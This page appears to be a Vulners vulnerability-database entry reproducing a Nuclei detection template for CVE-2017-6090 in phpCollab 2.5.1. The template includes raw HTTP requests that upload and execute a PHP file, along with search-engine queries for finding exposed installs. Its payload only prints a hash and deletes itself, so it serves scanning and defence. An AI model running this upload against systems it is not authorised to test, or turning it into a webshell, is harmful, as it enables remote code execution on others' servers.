Vulners
Lucene search
PhpColl 2.5.1 Arbitrary File Upload
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | PhpCollab 2.5.1 Shell Upload Exploit | 30 Sep 201700:00 | – | zdt |
| phpCollab 2.5.1 - Unauthenticated File Upload Exploit | 11 Jan 201800:00 | – | zdt |
 | CVE-2017-6090 | 2 Oct 201700:00 | – | circl |
 | PhpCollab Arbitrary Code Execution Vulnerability | 21 May 201800:00 | – | cnvd |
 | CVE-2017-6090 | 2 Oct 201717:00 | – | cve |
 | CVE-2017-6090 | 2 Oct 201717:00 | – | cvelist |
 | phpCollab 2.5.1 - Arbitrary File Upload | 2 Oct 201700:00 | – | exploitdb |
| phpCollab 2.5.1 - File Upload (Metasploit) | 11 Jan 201800:00 | – | exploitdb |
 | phpCollab 2.5.1 - Arbitrary File Upload | 2 Oct 201700:00 | – | exploitpack |
 | phpCollab 2.5.1 Unauthenticated File Upload | 20 Dec 201713:36 | – | metasploit |
10
id: CVE-2017-6090
info:
name: PhpColl 2.5.1 Arbitrary File Upload
author: pikpikcu
severity: high
description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.
impact: |
Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.
remediation: |
Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability.
reference:
- https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
- https://nvd.nist.gov/vuln/detail/CVE-2017-6090
- https://www.exploit-db.com/exploits/42934/
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-6090
cwe-id: CWE-434
epss-score: 0.86913
epss-percentile: 0.9945
cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: phpcollab
product: phpcollab
shodan-query:
- http.title:"PhpCollab"
- http.title:"phpcollab"
fofa-query: title="phpcollab"
google-query: intitle:"phpcollab"
tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive,vkev,vuln
variables:
string: "CVE-2017-6090"
http:
- raw:
- |
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------154934846911423734231554128137--
- |
GET /logos_clients/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{md5(string)}}'
- type: status
status:
- 200
# digest: 490a00463044022054deeb61b42d292b801cb6444a98f4ec3c9dd554ec4c0a109b84b5ae2a36c021022070e5f90fe13a6c37416300aec204ba9f041404650e093610a02dd109b5a18b06:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.1High risk
Vulners AI Score8.1
CVSS 26.5
CVSS 38.8
EPSS0.86913